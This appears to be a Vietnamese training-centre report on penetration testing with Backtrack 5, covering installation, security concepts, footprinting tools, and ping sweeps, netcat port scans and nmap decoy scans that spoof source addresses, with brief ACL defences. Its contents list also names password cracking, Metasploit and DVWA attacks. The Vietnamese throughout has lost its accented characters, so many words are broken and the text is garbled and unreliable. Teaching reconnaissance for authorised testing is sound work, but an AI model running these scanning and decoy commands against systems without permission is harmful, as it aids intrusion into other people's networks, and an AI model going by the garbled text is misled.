Professional Documents
Culture Documents
LI M U
u tin, xin gi li cm n chn thnh n thy V Thng Gim c Trung tm o to v qun tr mng an ninh mng Athena v thy L nh Nhn nhit tnh gip hon thnh ti liu ny. Cho gi li cm n n cc anh ch nhn vin t vn nhn vin h tr k thut ti Trung tm o to v qun tr mng Athena h tr v to iu kin hon thnh d n an nin mng ng thi hn c giao. Trn trng! Nhm thc hin Nguyn Sn Kh Tn Pht Nguyn Cao Thng
MC LC
Chng M u : GII THIU V BACKTRACK 5 ..................................... 6 I. II. Gii thiu ................................................................................................. 6 Mc ch .................................................................................................. 6
III. Ngun ti Backtrack : .............................................................................. 7 IV. Ci t ...................................................................................................... 8 1. 2. Live DVD ............................................................................................. 8 Install .................................................................................................... 8 Gii thiu ............................................................................................... 16 Vn bo mt h thng v mng......................................................... 16 1. 2. 3. Cc vn d chung v bo mt h thng v mng ............................... 16 Mt s khi nim v lch s bo mt h thng ................................... 16 Cc loi l hng bo mt v phng thc tn cng mng ch yu ... 17 Gii thiu v Footprinting ..................................................................... 21 Cc bc thc hin Footprinting ........................................................... 21 1. 2. 3. 4. 5. Xc nh vng hot ng ca chng ta .............................................. 21 Cc thng tin c sn cng khai ........................................................... 21 Whois v DNS Enumeration .............................................................. 21 Thm d DNS ..................................................................................... 22 Thm d mng .................................................................................... 22
III. Phng php thc hin Footprinting ..................................................... 22 IV. Cc cng c thc hin Footprinting: ..................................................... 25 1. 2. 3. 4. Sam Spade .......................................................................................... 25 Super Email Spider ............................................................................. 26 VitualRoute Trace .............................................................................. 27 Maltego ............................................................................................... 27
I. II. 1. 2. 3.
Gii thiu ............................................................................................... 28 Chng nng ............................................................................................ 28 Xc nh h thng c ang hot ng hay khng? ............................ 28 Xc nh cc dch v ang chy hoc ang lng nghe. ...................... 31 Xc nh h iu hnh ........................................................................ 37
III. Enumerating cc dch v mng.............................................................. 39 1. 2. 3. Http fingerprinting .............................................................................. 39 DNS Enumeration .............................................................................. 42 Netbios name ...................................................................................... 44 Gii Thiu .............................................................................................. 45 Cc K Thut Password Cracking ......................................................... 45 1. 2. 3. Dictionary Attacks/Hybrid Attacks .................................................... 45 Brute Forcing Attacks ........................................................................ 45 Syllable Attacks/Pre-Computed Hashes ............................................. 45
III. Cc Kiu Tn Cng Thng Gp .......................................................... 45 1. 2. 3. Active Password Cracking ................................................................. 45 Passive Password Cracking ................................................................ 46 Offline Password Cracking ................................................................ 46
IV. Cc cng c Password Cracking............................................................ 46 1. 2. V. 1. 2. 3. 4. Hydra .................................................................................................. 46 Medusa ............................................................................................... 48 Password Cracking Trn Cc Giao Thc .............................................. 51 HTTP (HyperText Tranfer Protocol) ................................................. 51 SSH (Secure Shell) ............................................................................. 58 SMB (Server Message Block) ............................................................ 61 RDP (Remote Desktop Protocol) ....................................................... 64 4
Chng 6: SYSTEM HACKING .................................................................... 67 I. 1. 2. 3. 4. 5. II. 1. 2. 3. GII THIU V METASPLOIT .......................................................... 67 Gii thiu ............................................................................................ 67 Cc thnh phn ca Metasploit .......................................................... 67 S dng Metasploit Framework ......................................................... 67 Gii thiu Payload Meterpreter .......................................................... 68 Cch phng chng .............................................................................. 70 Li MS10-046 (2286198) ...................................................................... 70 Gii thiu ............................................................................................ 70 Cc bc tn cng: ............................................................................. 71 Cch phng chng .............................................................................. 79 Gii thiu ............................................................................................ 80 Cc bc tn cng .............................................................................. 80 Cch phng chng .............................................................................. 85 Gii thiu ............................................................................................... 86 Hng dn ci t DVWA trn Backtrack ............................................ 86 1. 2. Ti v ci t XAMPP........................................................................ 86 Ti v ci t DVWA ......................................................................... 88
III. Cc k thut tn cng trn DVWA ......................................................... 92 1. 2. XSS (Cross-Site Scripting) ................................................................. 92 SQL Injection ...................................................................................100
Backtrack l mt bn phn phi dng Live DVD ca Linux, c pht trin th nghim thm nhp. Trong cc nh dng Live DVD, chng ta s dng c th Backtrack trc tip t a DVD m khng cn ci n vo my ca chng ta. Backtrack cng c th c ci t vo cng v s dng nh mt h iu hnh. Backtrack l s hp nht gia 3 bn phn phi khc nhau ca Linux v thm nhp th nghim IWHAX, WHOPPIX, v Auditor. Trong phin bn hin ti ca n (5), Backtrack c da trn phin bn phn phi Linux Ubuntu 11.10. Tnh n ngy 19 thng by nm 2010, Backtrack 5 c ti v ca hn 1,5 triu ngi s dng. Phin bn mi nht l Backtrack 5 R2 Mc ch Cng c Backtrack c lch s pht trin kh lu qua nhiu bn linux khc nhau. Phin bn hin nay s dng bn phn phi Slackware linux (Tomas M. (www.slax.org)). Backtrack lin tc cp nht cc cng c, drivers,... hin ti Backtrack c trn 300 cng c phc v cho vic nghin cu bo mt. Backtrack l s kt hp gia 2 b cng c kim th bo mt rt ni ting l Whax v Auditor. II. Backtrack 5 cha mt s cng c c th c s dng trong qu trnh th nghim thm nhp ca chng ta. Cc cng c kim tra thm nhp trong Backtrack 5,0 c th c phn loi nh sau: Information gathering: loi ny c cha mt s cng c c th c s dng c c thng tin lin quan n mt mc tiu DNS, nh tuyn, a ch e-mail, trang web, my ch mail, v nh vy. Thng tin ny c thu thp t cc thng tin c sn trn Internet, m khng cn chm vo mi trng mc tiu. Network mapping: loi ny cha cc cng c c th c s dng kim tra cc host ang tn ti, thng tin v OS, ng dng c s dng bi mc tiu, v cng lm portscanning. Vulnerability identification: Trong th loi ny, chng ta c th tm thy cc cng c qut cc l hng (tng hp) v trong cc thit b Cisco. N cng cha cc cng c thc hin v phn tch Server Message Block (SMB) v Simple Network Management Protocol (SNMP). Web application analysis: loi ny cha cc cng c c th c s dng trong theo di, gim st cc ng dng web 6
Radio network analysis: kim tra mng khng dy, bluetooth v nhn dng tn s v tuyn (RFID), chng ta c th s dng cc cng c trong th loi ny. Penetration: loi ny cha cc cng c c th c s dng khai thc cc l hng tm thy trong cc my tnh mc tiu Privilege escalation: Sau khi khai thc cc l hng v c truy cp vo cc my tnh mc tiu, chng ta c th s dng cc cng c trong loi ny nng cao c quyn ca chng ta cho cc c quyn cao nht. Maintaining access: Cng c trong loi ny s c th gip chng ta trong vic duy tr quyn truy cp vo cc my tnh mc tiu. Chng ta c th cn c c nhng c quyn cao nht trc khi cc chng ta c th ci t cng c duy tr quyn truy cp Voice Over IP (VOIP): phn tch VOIP chng ta c th s dng cc cng c trong th loi ny Digital forensics: Trong loi ny, chng ta c th tm thy mt s cng c c th c s dng lm phn tch k thut nh c c hnh nh a cng, cu trc cc tp tin, v phn tch hnh nh a cng. s dng cc cng c cung cp trong th loi ny, chng ta c th chn Start Backtrack Forensics trong trnh n khi ng. i khi s i hi chng ta phi gn kt ni b a cng v cc tp tin trao i trong ch ch c bo tn tnh ton vn. Reverse engineering: Th loi ny cha cc cng c c th c s dng g ri chng trnh mt hoc tho ri mt tp tin thc thi. III. Ngun ti Backtrack :
IV.
Ci t
1. Live DVD
Nu chng ta mun s dng Backtrack m khng cn ci n vo cng, chng ta c th ghi tp tin nh ISO vo a DVD, v khi ng my tnh ca chng ta vi DVD. Backtrack sau s chy t a DVD. Li th ca vic s dng Backtrack l mt DVD Live l n l rt d dng lm v chng ta khng cn phi gy ri vi cu hnh my hin ti ca chng ta. Tuy nhin, phng php ny cng c mt s nhc im. Backtrack c th khng lm vic vi phn cng, v thay i cu hnh no c thc hin trn phn cng lm vic s khng c lu vi a DVD Live. Ngoi ra, n l chm, v my tnh cn phi ti cc chng trnh t a DVD.
2. Install
a) Ci t trong my tht:
Chng ta cn chun b mt phn vng ci t Backtrack. Sau chy Backtrack Live DVD. Khi gp mn hnh login Ta s dng username l root, pass l toor. Sau vo ch ha, ta g startx v ta s vo ch ha ca Backtrack 5. ci t Backtrack 5 n a cng ta chn tp tin c tn install.sh trn desktop v tin hnh ci t. Tuy nhin, nu khng th tm thy tp tin, chng ta c th s dng ubiquity ci t. s dng ubiquity, ta m Terminal g ubiquity. 8
Sau ca s ci t s hin th. Sau tr li 1 s cu hi nh thnh ph chng ta ang sng, keyboard layout, phn vng a ci t, Sau tin hnh ci t.
b) Ci t trong my o:
im thun li l ta khng cn chun b mt phn vng cho Backtrack, v s dng ng thi mt OS khc. Khuyt im l tc chm, khng dng c wireless tr USB wireless. Ta c th c th s dng file VMWare c cung cp bi BackTrack. T y chng ta c BackTrack trn my o tht d dng v nhanh chng. Cu hnh trong file VMWare l memory 768MB, hardisk :30GB, Network:NAT. s dng c card mng tht, ta phi chn Netword l Briged Di y lm mt s hnh nh khi ci BackTrack trn my o VMWare
10
11
13
Nhn Install bt u ci
Qu trnh ci bt u.
14
15
Chng 1:
I.
Gii thiu An ninh an ton mng my tnh hon ton l vn con ngi, do vic a ra mthnh lang php l v cc quy nguyn tc lm vic c th l cn thit. y, hnhlang php l c th gm: cc iu khon trong b lut ca nh nc, cc vn bndi lut,... Cn cc quy nh c th do tng t chc t ra cho ph hp vi tngc im ring. Cc quy nh c th nh: quy nh v nhn s, vic s dng my,s dng phn mm,... V nh vy, s hiu qu nht trong vic m bo an ninh anton cho h thng mng my tnh mt khi ta thc hin trit gii php v chnhsch con ngi.Tm li, vn an ninh an ton mng my tnh l mt vn ln, n yucu cn phi c mt gii php tng th, khng ch phn mm, phn cng my tnhm n i hi c vn chnh sch v con ngi. V vn ny cn phi cthc hin mt cch thng xuyn lin tc, khng bao gi trit c v n lunny sinh theo thi gian. Tuy nhin, bng cc gii php tng th hp l, c bit lgii quyt tt vn chnh sch v con ngi ta c th to ra cho mnh s an tonchc chn hn. II. Vn bo mt h thng v mng
c im chung ca mt h thng mng l c nhiu ngi s dng chung v phn tn v mt a l nn vic bo v ti nguyn (mt mt hoc s dng khng hp l) phc tp hn nhiu so vi vic mi trng mt my tnh n l, hoc mtngi s dng.Hot ng ca ngi qun tr h thng mng phi m bo cc thng tin trnmng l tin cy v s dng ng mc ch, i tng ng thi m bo mng hotng n nh khng b tn cng bi nhng k ph hoi. Nhng trn thc t l khng mt mng no m bo l an ton tuyt i, mth thng d c bo v chc chn n mc no th cng c lc b v hiu ha binhng k c xu.
2. Mt s khi nim v lch s bo mt h thng
a) i tng tn cng mng (intruder)
i tng l nhng c nhn hoc t chc s dng nhng kin thc v mngv cc cng c ph hoi (gm phn cng hoc phn mm) d tm cc im yuv cc l hng bo mt trn h thng, thc hin cc hot ng xm nhp v chimot ti nguyn tri php.Mt s i tng tn cng mng nh:Hacker: l nhng k xm nhp vo mng tri php bng cch s dng cccng c ph mt khu hoc khai thc cc im yu ca thnh phn truy nhp trn hthngMasquerader : L nhng 16
k gi mo thng tin trn mng nh gi mo a chIP, tn min, nh danh ngi dngEavesdropping: L nhng i tng nghe trm thng tin trn mng, s dngcc cng c Sniffer, sau dng cc cng c phn tch v debug ly c ccthng tin c gi tr. Nhng i tng tn cng mng c th nhm nhiu mc ch khc nhau nhn cp cc thng tin c gi tr v kinh t, ph hoi h thng mng c ch nh, hocc th l nhng hnh ng v thc
b) Cc l hng bo mt
Cc l hng bo mt l nhng im yu trn h thng hoc n cha trongmt dch v m da vo k tn cng c th xm nhp tri php vo h thng thc hin nhng hnh ng ph hoi chim ot ti nguyn bt hp php.C nhiu nguyn nhn gy ra nhng l hng bo mt: c th do li ca bnthn h thng, hoc phn mm cung cp hoc ngi qun tr yu km khng hiusu v cc dch v cung cpMc nh hng ca cc l hng ti h thng l khc nhau. C l hngch nh hng ti cht lng dch v cung cp, c l hng nh hng ti ton b hthng hoc ph hy h thng
c) Chnh sch bo mt
Chnh sch bo mt l tp hp cc quy tc p dng cho nhng ngi thamgia qun tr mng, c s dng cc ti nguyn v cc dch v mng. i vi tng trng hp phi c chnh sch bo mt khc nhau. Chnh sch bo mt gip ngi s dng bit trch nhim ca mnh trong vic bo v cc tinguyn trn mng, ng thi cn gip cho nh qun tr mng thit lp cc bin phpm bo hu hiu trong qu trnh trang b, cu hnh v kim sot hot ng ca hthng v mng.
3. Cc loi l hng bo mt v phng thc tn cng mng ch yu
a) Cc loi l hng
C nhiu cc t chc tin hnh phn loi cc dng l hng c bit. Theo b quc phng M cc loi l hng c phn lm ba loi nh sau: L hng loi C Cho php thc hin cc hnh thc tn cng theo DoS(Denial of Services- T chi dch v) Mc nguy him thp ch nh hng ticht lng dch v, lm ngng tr, gin on h thng, khng lm ph hng d liuhoc t c quyn truy cp bt hp php.DoS l hnh thc tn cng s dng cc giao thc tng Internet trong bgiao thc TCP/IP lm h thng ngng tr dn n tnh trng t chi ngi sdng hp php truy nhp hay s dng h thng.Cc dch v c l hng cho php cc cuc tn cng DoS c th c nngcp hoc sa cha bng cc phin bn mi hn ca cc nh 17
cung cp dch v. Hinnay cha c mt bin php hu hiu no khc phc tnh trng tn cng kiu nyv bn thn thit k tng Internet (IP) ni ring v b giao thc TCP/IP ni chung n cha nhng nguy c tim tang ca cc l hng loi ny. L hng loi B: Cho php ngi s dng c thm cc quyn trn h thng m khng cn kim tra tnh hp l dn n mt mt thng tin yu cu cn bo mt.L hng ny thng c trong cc ng dng trn h thng . C mc nguy him l trung bnh.L hng loi B ny c mc nguy him hn l hng loi C. Cho phpngi s dng ni b c th chim c quyn cao hn hoc truy nhpkhnghp php. Nhng l hng loi ny thng xut hin trong cc dch v trn h thng. Ng s dng local c hiu l ngi c quyn truy nhp vo h thng vimt s quyn hn nht nh. Tm hiu vn bo mt mng LAN. Mt dng khc ca l hng loi B xy ra vi cc chng trnh vit bng m ngun C. Nhng chng trnh vit bng m ngun C thng s dng mt vngm, mt vng trong b nh s dng lu tr d liu trc khi x l. Ngi lptrnh thng s dng vng m trong b nh trc khi gn mt khong khng gian b nh cho tng khi d liu. V d khi vit chng trnh nhp trng tn ngi sdng quy nh trng ny di 20 k t bng khai bo:Char first_name [20]; Khai bo ny cho php ngi s dng nhp ti a 20k t. Khi nhp d liu ban u d liu c lu vng m. Khi ngi s dngnhp nhiu hn 20 k t s trn vng m. Nhng k t nhp tha s nm ngoivng m khin ta khng th kim sot c. Nhng i vi nhng k tn cngchng c th li dng nhng l hng ny nhp vo nhng k t c bit thcthi mt s lnh c bit trn h thng. Thng thng nhng l hng ny c lidng bi nhng ngi s dng trn h thng t c quyn root khng hp l. hn ch c cc l hng loi B phi kim sot cht ch cu hnh h thng vcc chng trnh. L hng loi A Cho php ngi ngoi h thng c th truy cp bt hp phpvo h thng. C th lm ph hu ton b h thng. Loi l hng ny c mc rtnguy him e da tnh ton vn v bo mt ca h thng. Cc l hng ny thngxut hin nhng h thng qun tr yu km hoc khng kim sot c cu hnhmng. Nhng l hng loi ny ht sc nguy him v n tn ti sn c trn phnmm s dng, ngi qun tr nu khng hiu su v dch v v phn mm s dngc th b qua im yu ny. V vy thng xuyn phi kim tra cc thng bo cacc nhm tin v bo mt trn mng pht hin nhng l hng loi ny. Mt lotcc chng trnh phin bn c thng s dng c nhng l hng loi A nh: FTP,Gopher, Telnet, Sendmail, ARP, finger. 18
Scanner Scanner l mt chng trnh t ng r sot v pht hin nhng im yu v bo mt trn mt trm lm vic cc b hoc mt trm xa. Mt k ph hoi s dng chng trnh Scanner c th pht hin ra nhng l hng v bo mt trn mtServer d xa.C ch hot ng l r sot v pht hin nhng cng TCP/UDP c s dng trn h thng cn tn cng v cc dch v s dng trn h thng . Scanner ghi li nhng p ng trn h thng t xa tng ng vi dch v m n pht hinra. T n c th tm ra im yu ca h thng. Nhng yu t mt Scanner hot ng nh sau:Yu cu thit b v h thng: Mi trng c h tr TCP/IPH thng phi kt ni vo mng Internet.Cc chng trnh Scanner c vai tr quan trng trong mt h thng bo mt,v chng c kh nng pht hin ra nhng im yu km trn mt h thng mng. Password Cracker L mt chng trnh c kh nng gii m mt mt khu c m hohoc c th v hiu ho chc nng bo v mt khu ca mt h thng.Mt s chng trnh ph kho c nguyn tc hot ng khc nhau. Mt schng trnh to ra danh sch cc t gii hn, p dng mt s thut ton m ho t kt qu so snh vi Password m ho cn b kho to ra mt danh sch khctheo mt logic ca chng trnh.Khi thy ph hp vi mt khu m ho, k ph hoi c c mt khudi dng text . Mt khu text thng thng s c ghi vo mt file.Bin php khc phc i vi cch thc ph hoi ny l cn xy dng mtchnh sch bo v mt khu ng n. Sniffer Sniffer l cc cng c (phn cng hoc phn mm)bt cc thng tin luchuyn trn mng v ly cc thng tin c gi tr trao i trn mng.Sniffer c th bt c cc thng tin trao i gia nhiu trm lm vic vinhau. Thc hin bt cc gi tin t tng IP tr xung. Giao thc tng IP c nhngha cng khai, v cu trc cc trng header r rng, nn vic gii m cc gi tin ny khng kh khn. Mc ch ca cc chng trnh sniffer l thit lp ch promiscuous(mode dng chung) trn cc card mng ethernet - ni cc gi tin trao i trongmng - t "bt" c thng tin.Cc thit b sniffer c th bt c ton b thng tin trao i trn mng lda vo nguyn tc broadcast (qung b) cc gi tin trong mng Ethernet.Tuy nhin vic thit lp mt h thng sniffer khng phi n gin v cn phi xm nhp c vo h thng mng v ci t cc phn mm sniffer.ng thi cc chng trnh sniffer cng yu cu ngi s dng phi hiusu v kin trc, cc giao thc mng.Vic pht hin h thng b sniffer khng phi n gin, v sniffer hot ng tng rt thp, v khng nh hng ti cc ng dng cng nh cc dch v hthng 19
cung cp.Tuy nhin vic xy dng cc bin php hn ch sniffer cng khng qu khkhn nu ta tun th cc nguyn tc v bo mt nh: Khng cho ngi l truy nhp vo cc thit b trn h thng Qun l cu hnh h thng cht ch Thit lp cc kt ni c tnh bo mt cao thng qua cc c ch m ho. Trojans Trojans l mt chng trnh chy khng hp l trn mt h thng. Vi vaitr nh mt chng trnh hp php. Trojans ny c th chy c l do cc chngtrnh hp php b thay i m ca n thnh m bt hp php.V d nh cc chng trnh virus l loi in hnh ca Trojans. Nhngchng trnh virus thng che du cc on m trong cc chng trnh s dng hp php. Khi nhng chng trnh ny c kch hot th nhng on m n du sthc thi v chng thc hin mt s chc nng m ngi s dng khng bit nh: ncp mt khu hoc copy file m ngi s dng nh ta thng khng hay bit.Mt chng trnh Trojans s thc hin mt trong nhng cng vic sau: Thc hin mt vi chc nng hoc gip ngi lp trnh ln n pht hinnhng thng tin quan trng hoc nhng thng tin c nhn trn mt h thng hocch trn mt vi thnh phn ca h thng . Che du mt vi chc nng hoc l gip ngi lp trnh pht hin nhngthng tin quan trng hoc nhng thng tin c nhn trn mt h thng hoc ch trnmt vi thnh phn ca h thng. Ngoi ra cn c cc chng trnh Trojan c th thc hin c c hai chc nngny. C chng trnh Trojan cn c th ph hy h thng bng cch ph hoi ccthng tin trn cng. Nhng ngy nay cc Trojans kiu ny d dng b pht hin vkh pht huy c tc dng.Tuy nhin c nhng trng hp nghim trng hn nhng k tn cng to ranhng l hng bo mt thng qua Trojans v k tn cng ly c quyn root trnh thng v li dng quyn ph hy mt phn hoc ton b h thng hocdng quyn root thay i logfile, ci t cc chng trnh trojans khc m ngiqun tr khng th pht hin c gy ra mc nh hng rt nghim trng vngi qun tr ch cn cch ci t li ton b h thng.
20
Chng 2:
I.
FOOTPRINTING
Gii thiu v Footprinting L mt k thut tm kim thng tin v mt danh nghip, c nhn hay t chc. Mt trong 3 giai on cn phi lm thc hin mt cuc tn cng. Mt k tn cng dnh 90% thc hin vic thu thp v tim kim thng tin v 10% thc hin tn cng. Kt qu ca qu trnh Footprinting l ly c thng tin c bn ca mc tiu tn cng: Tn, a ch cng ty, website, cc thnh vin trong cng ty, s mng, Cc thng tin cn tm kim: Internet: Domain, Network blocks, IP, TCP hay UDP, System Enumeration, ACLs, IDSes, Intranet Remote access: Remote system type, Extranet: Connection origination and destination, Cc bc thc hin Footprinting Bao gm cc bc sau:
II.
Th u tin trong kinh doanh l xc nh vng hot ng ca cc hot ng footprinting ca chng ta. N c th l mt nhim v nn lng xc nh tt c cc thc th trong mt t chc no . Tuy nhin, hacker chng thng cm cho cuc chin ca chng ta. H khai thc cc im yu trong bt c cc biu mu no. Chng ta khng mun hacker bit nhiu v tnh trng bo mt ca chng ta.
2. Cc thng tin c sn cng khai
Lng thng tin m n sn sng sn c cho chng ta, t chc chng ta v bt c nhng g chng ta c th hnh dung th chng l g thiu tnh tuyt vi. Nhng thng tin c th bao gm: trang web ca cng ty; cc t chc quan h; v tr ta lc; thng tin chi tit v nhn vin; cc s kin hin ti; cc chnh sch bo mt v s ring t.
3. Whois v DNS Enumeration
Xem chi tit thng tin v a ch IP, name server, dns server
21
4. Thm d DNS
Sau khi xc nh tt c cc domain c lin quan, chng ta bt u truy vn DNS. DNS l mt c s d liu phn tn dng nh x cc a ch IP thnh hostname. Nu DNS khng c cu hnh mt cch bo mt, rt c kh nng ly c cc thng tin bi l t t chc.
5. Thm d mng
By gi th chng ta xc nh c cc mng tim nng, chng ta c th xc nh m hnh mng cng nh ng truy cp c kh nng vo mng
III.
Phng php thc hin Footprinting C 2 phng php thc Footprinting: Active Footprinting: lin h trc tip vi mc tiu, tm hiu thng tin cn thit Passive Footprinting: Tm kim thng qua cc bi bo, trang web, hoc t cc i th mc tiu, Website: www.google.com http://whois.domaintools.comwww.whois.net , www.arcchive.org , , ,
www.tenmien.vn
22
Whois : athena.com.vn
23
Tenmien.vn
24
Archive: http://www.microsoft.com
Cc cng c thc hin Footprinting: Sam Spade, Super email spider, VitualRoute Trace, Google Earth, Whois, Site Digger, Maltego, IV.
1. Sam Spade
Cho php ngi s dng c th thc hin cc hnh ng: Ping, Nslookup, Whois, Traceroute, 25
Tm kim thng tin v a ch email ca c quan t chc s dng Search Engine: Google, Lycos, iWon, Exiter, Hotbot, MSN, AOL,
26
3. VitualRoute Trace
4. Maltego
L cng c dng pht hin cc lin kt gia: Ngi s dng, c quan, t chc, website, domain, di mng, a ch IP,
27
Chng 3:
I.
SCANNING
Gii thiu Nu footprinting l vic xc nh ngun thng tin ang u th scanning l vic tm ra tt c cc cnh ca xm nhp vo ngun thng tin . Trong qu trnh footprinting, chng ta t c danh sch dy mng IP v a ch IP thng qua nhiu k thut khc nhau bao gm whois v truy vn ARIN. K thut ny cung cp cho nh qun tr bo mt cng nh hacker nhiu thng tin co gi tr v mng ch, dy IP, DNS servers v mail servers. Trong chng ny, chng ta s xc nh xem h thng no ang lng nghe trn giao thng mng v c th bt c qua vic s dng nhiu cng c v k thut nh ping sweeps, port scan. Chng ta c th d dng vt tng la bng tay (bypass firewalls) scan cc h thng gi s nh n ang b kha bi chnh sch trch lc (filtering rules). II. Chng nng
Mt trong nhng bc c bn lp ra mt mng no l ping sweep trn mt dy mng v IP xc nh cc thit b hoc h thng c ang hot ng hay khng. Ping thng c dng gi cc gi tin ICMP ECHO ti h thng ch v c gng nhn c mt ICMP ECHO REPLY bit h thng ang hot ng. Ping c th c chp nhn xc nh s lng h thng cn sng c trong mng trong mng va v nh ( Lp C c 254 v B c 65534 a ch) v chng ta c th mt hng gi, hng ngy hon thnh cho nhnh mng lp A 16277214 a ch.
a) Netword Ping Sweeps
Netword pinging l hnh ng gi cc loi ca giao thng mng ti ch v phn tch kt qu. Pinging s dng ICMP (Internet Control Message Protocol). Ngoi ra, n cn s dng TCP hoc UDP tm host cn sng. thc hin ICMP ping sweep, ta c th s dng fping, nmap,. Fping a g 192.168.10.1 192.168.10.10 -a hin thi host ang sng: alive -g dy a ch: 192.168.10.0/24 or nh trn
28
29
Phng chng: chng ta c th dng pingd gi tt c cc giao thng mng ICMP ECHO v ICMP ECHO REPLY cp host. im ny t c bng cch g b s h tr ca vic x l ICMP ECHO t nhn h thng. V mt c bn, n cung cp mt c ch iu khin truy cp mc h thng.
b) ICMP query
Ping sweeps (or ICMP ECHO packets) c th ni ch l nh u ca tng bng khi ni n thng tin ICMP v mt h thng. chng ta c th thu thp nhiu loi thng tin c gi tr n gin bng cch cc gi tin ICMP. Chng ta c th yu cu mt n mng ca mt thit b no vi Address Mask Request. Mt n mng rt quan trng v chng ta c th xc nh c tt c a ch ca ch, bit c gatewate mt nh, a ch broadcast. Nh vo gateway mc nh, chng ta c th tn cng router. Vi a ch broadcast. Nhng khng phi tt c cc router no cng h tr Time v Netmask. Phng chng: Kha loi ICMP m cung cp thng tin ti router bin (router i ra ISP). gim ti mc thiu, chng ta nn dng access list (ACLs): o Access-list 101 deny icmp any any 13 // yu cu timestamp o Access-list 101 deny icmp any any 17 // yu cu address mask 30
Port scanning l qu trnh gi cc gi tin ti cng TCP v UDP trn h thng ch xc nh dch v no ang chy hoc trong tnh trng ang lng nghe. Vic xc nh ang lng nghe l rt quan trng xc nh cc dch v ang chy. Thm vo , chng ta c th xc nh loi v phin bn h iu hnh ang chy v ng dng ang x dng.
b) Cc Loi Scan
Trc khi thc hin port scanning, chng ta nn im qua mt s cch thc qut sn c: TCP Connect scan: loi ny kt ni ti cng ch v thc hin y quy trnh bt tay ba bc (SYN, SYN/ACK, ACK). Tuy nhin iu ny th d dng b pht hin bi h thng ch. N s dng li gi h thng thay cho cc gi tin sng (raw packets) v thng c s dng bi nhng ngi dng Unix khng c quyn.V SYN Scan khng th thc hin c. TCP SYN scan: n khng to ra mt kt ni ti ngun m ch gi gi tin SYN(bc u tin trong ba bc to kt ni) ti ch. Nu a gi tin SYN/ACK c tr v th chng ta bit c cng ang lng nghe. Ngc li, nu nhn c RST/ACK th cng khng lng nghe. K thut ny kh b pht hin hn l TCP connect v n khng lu li 31
thng tin my tnh ch. Tuy nhin, mt trong nhng nhc im ca k thut ny l c th to ra iu kin t chi dch v DoS nu c qu nhiu kt ni khng y c to ra. V vy, k thut ny l an ton nu khng c qu nhiu kt ni nh trn c to ra. TCP ACK Scan: k thut ny c dng vch ra cc quy tt thit lp tng la. n c th gip xc nh xem tng la l trnh trch lc cc gi tin n gin cho php to kt ni hay l trnh trch lc nng cao. Tuy nhin n khng th phn bit c cng no open hay closed. TCP Windows Scan: Ging vi ACK Scan, im khc l n c th pht hin cng open vi closed. UDP Scan: k thut ny gi mt gi tin UDP ti cng ch. Nu cng ch tr li vi thng ip ICMP port unreachable th cng closed. Nu khng nhn c thng ip trn th cng trn ang m. Tuy nhin, UDP scan l mt qu trnh rt chp nu nh chng ta c gng scan mt thit b no m c p chnh sch trch lc gi tin mnh. TCP FIN, XMAS, NULL: chng chuyn nghip trong vic ln lt vt tng la khm ph cc h thng pha sau. Tuy nhin, chng li ph thuc nhiu vo cch x l ca h thng ch m(in hnh l Windows) th khng c biu hin g. Strobe: c tin cy cao, tuy nhin ch h tr TCP, khng h tr UDP
32
Netcat l mt tin ch mng Unix n gin tnh nng c v ghi d liu qua kt ni mng, s dng giao thc TCP / IP.N c thit k nh l mt cng c ng tin cy "back-end" c th c s dng trc tip hoc d dng iu khin bi cc chng trnh v cc script khc. ng thi, n l cng c g li mng vi nhiu tnh nng v cng c thm d. Nc v z w2 192.168.10.102 1-4000 -v: xut chi tit ra mn hnh -z: zero-I/O mode khng gi d liu no ch pht ra mt gi tin. 192.168.10.102: host 1-4000: port cn qut.
Nmap (Network Mapper) l mt tin ch ngun m min ph cho pht hin mng v kim ton an ninh. Nhiu qun tr mng v h thng cng tm thy s hu ch cho cc cng vic nh kim k mng li, dch v qun l lch trnh, v theo di thi gian hot ng dch v v my ch. Nmap s dng cc gi tin IP th trong cc phng php mi xc nh host no c sn trn mng, cc dch v (tn ng dng v phin bn) m host ang cung cp, h iu hnh g (v cc phin bn h iu hnh) m h ang chy, loi b lc gi tin hoc tng la no ang s dng, v nhiu c im khc. N c thit k scan nhanh chng cc mng 33
ln, nhng ho. Nmap chy c trn tt c cc h iu hnh, v cc gi nh phn chnh thc c sn cho Linux, Windows, v Mac OS X. Cch dng n gin nht, khng c t tham s: nmap 192.168.10.0/24
a. Chuyn <target> t hostname thnh Ipv4 s dng DNS. Nu l mt a ch IP th khng cn chuyn. b. Thc hin ping ti host, mc nh vi mt gi tin yu cu ICMP echo v mt g tin TCP ACK gi ti cng 80 xc nh host c ang up hay khng? Nu khng, nmap s thot v hin thng bo. Chng ta c th s dung Ping NULL(-PN) b qua bc ny. c. Chuyn IP ch thnh tn vi truy vn DNS ngc. iu ny c th b qua vi thuc tnh n ci thin tc v kh nng khng bi pht hin. d. Thc hin qut TCP port vi hn 1000 port ph bin c lit k ti nmap-services. Qu trnh scan SYN s c thc hin, nhng Connect scan s c thay th khi ngi dng Unix khng phi root thiu quyn cn thit gi cc gi tin th.
e. In kt qua ln mn hnh Qut host ang up: nmap sP PE 192.168.10.0/24 -sP: ping scan -PE: ping echo
35
Ph thuc vo phc tp ca mng ch v cc host, qu trnh qut c th d dng b pht hin.Nmap cung cp kh nng lm gi a ch ngun vi ty chn Ddecoy. N c to ra lm trn ngp ci site ch vi nhng thng tin gi mo. Th c bn nm pha sau ty chn ny l chy scan gi cng lc vi scan tht. H thng ch s tr li trn cc a ch gi cng nh scan port thc ca chng ta. V quan trng hn c l a ch gi phi cn sng. Ngc li, qu trnhscan vi SYN v dn n iu kin t chi dch v Nmap sSPE 192.168.10.0/24 D 10.10.10.1
36
d) Phng chng:
Tt tt c cc dch v khng cn thit. Trn Unix, chng ta c th thc hin iu ny bng cch xem cc dch v khng cn thit trong /ect/inetd.conf v tt cc dch vscript lc khi ng. Trn Windows, rt kh tt cc dch v khng cn thit v theo cch hot ng ca Windows, cng TCP 139 v 445 cung cp nhiu chc nng Windows hot ng.
3. Xc nh h iu hnh
Nhiu cng c mnh v nhiu k thut qut port c sn tm cc cng m trn h thng ch. Nu nhn li, i tng u tin ca chng ta l qut cng xc nh cc cng TCP v UDP trn my ch. V vi nhng thng tin , chng ta c th cng no ang lng nghe c im yu no chng? Nhng chng ta cn tm nhiu thng tin hn v mc tiu. chnh l xc nh h iu hnh.
a) Active OS Detection
